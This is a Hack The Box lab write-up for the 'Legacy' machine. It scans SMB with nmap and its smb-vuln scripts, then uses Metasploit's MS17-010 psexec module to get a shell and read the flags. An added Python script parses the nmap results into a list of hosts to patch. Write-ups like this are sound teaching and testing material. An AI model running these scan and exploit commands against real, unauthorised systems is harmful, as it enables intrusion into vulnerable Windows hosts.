# Legacy

![info-card](/files/-M0-wL-D74SJ1UAjlN7W)

## Initial Enumeration

Like any other target, we'll start off with a quick port scan to see what we're working with:

```bash
nmap -sV 10.10.10.4
```

![Initial Nmap Scan](/files/-M0-wL-F4VFAUuXGBpKT)

Looking at this output, it's safe to say SMB is the target here. Let's take a closer look at this service using some NSE scripts:

```bash
nmap -p 139,445 --script=smb-vuln* 10.10.10.4
```

![SMB Vulnerability Scan](/files/-M0-wL-HABELXCNfBm0J)
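A `smb-vuln*` scan like the one above is most useful when its output is turned into a list of hosts to patch. The script below is an added example, not part of the original write-up: it parses `nmap -oX` XML from such a scan and reports each host's NSE `State:` value, treating errored or stateless results as UNKNOWN rather than clean. `SAMPLE_NMAP_XML` is a constructed sample modelled on nmap's XML format; only 10.10.10.4 is the write-up's target, the other addresses are made up.

```python
# Added example (not from the original write-up): turn `nmap -oX` output of the
# `--script=smb-vuln*` scan shown above into a per-host remediation list.
# SAMPLE_NMAP_XML is a CONSTRUCTED sample modelled on nmap's XML format; only
# 10.10.10.4 is the write-up's target, the other addresses are made up.  nmap
# writes newlines inside the script `output` attribute as &#xa;, as done here.
import re
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p 139,445 --script=smb-vuln* -oX - 10.10.10.0/29">
  <host><address addr="10.10.10.4" addrtype="ipv4"/><hostscript>
    <script id="smb-vuln-ms17-010" output="&#xa;  VULNERABLE:&#xa;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#xa;    State: VULNERABLE&#xa;"/>
  </hostscript></host>
  <host><address addr="10.10.10.5" addrtype="ipv4"/><hostscript>
    <script id="smb-vuln-ms17-010" output="&#xa;  NOT VULNERABLE:&#xa;    State: NOT VULNERABLE&#xa;"/>
  </hostscript></host>
  <host><address addr="10.10.10.6" addrtype="ipv4"/><hostscript>
    <script id="smb-vuln-ms17-010" output="ERROR: Script execution failed (use -d to debug)"/>
  </hostscript></host>
</nmaprun>
"""

STATE_RE = re.compile(r"^\s*State:\s*(.+?)\s*$", re.MULTILINE)


def smb_vuln_states(nmap_xml: str) -> dict:
    """Map host address -> {script id: NSE 'State:' value} for smb-vuln* scripts.
    A script that errored or printed no State line is recorded as UNKNOWN so it
    is never mistaken for a clean result."""
    results = {}
    for host in ET.fromstring(nmap_xml).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        per_host = {}
        for script in host.iter("script"):
            sid = script.get("id", "")
            if sid.startswith("smb-vuln"):
                m = STATE_RE.search(script.get("output", ""))
                per_host[sid] = m.group(1).upper() if m else "UNKNOWN"
        results[addr_el.get("addr")] = per_host
    return results


def hosts_needing_patch(nmap_xml: str) -> list:
    """Addresses where any smb-vuln script reports a (possibly LIKELY) VULNERABLE state."""
    return sorted(addr for addr, scripts in smb_vuln_states(nmap_xml).items()
                  if any("VULNERABLE" in s and not s.startswith("NOT") for s in scripts.values()))
```

Running `hosts_needing_patch(SAMPLE_NMAP_XML)` on the sample yields only 10.10.10.4, while the UNKNOWN host is surfaced in `smb_vuln_states` for a manual follow-up.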

Bingo, now we just have to find ourselves an exploit. In the interest of time, we'll just use Metasploit to exploit this vulnerability. I originally intended to show how to do this manually, but due to the older version of Windows this box is running, I ran into a lot of issues. For a non-Metasploit look at MS17-010, be sure to take a look at my write-up on [blue](https://wiki.jacobshodd.com/writeups/hack-the-box/blue). The first thing we'll do is start `msfconsole` and validate that this exploit will work on this target:

```bash
# starting msfconsole
msfconsole

# the following happens inside the console:
use exploit/windows/smb/ms17_010_psexec
set RHOST 10.10.10.4
check
```

![MSF Exploit Validation](/files/-M0-wL-JoBFKRZFcOlMs)

## Exploitation

Exploitation from here on is pretty simple. So simple, in fact, that it just takes typing one word: `exploit`. While I prefer not to use Metasploit for learning purposes, I can't deny how convenient it makes common exploits like this:

![Executing the exploit](/files/-M0-wL-LzP5VmJerPwRY)

From here we can either grab the flags using Meterpreter commands or spawn a shell with the `shell` command. Either way, we are able to read the flags:

![Flags](/files/-M0-wL-NdD-4FjGNaBi6)
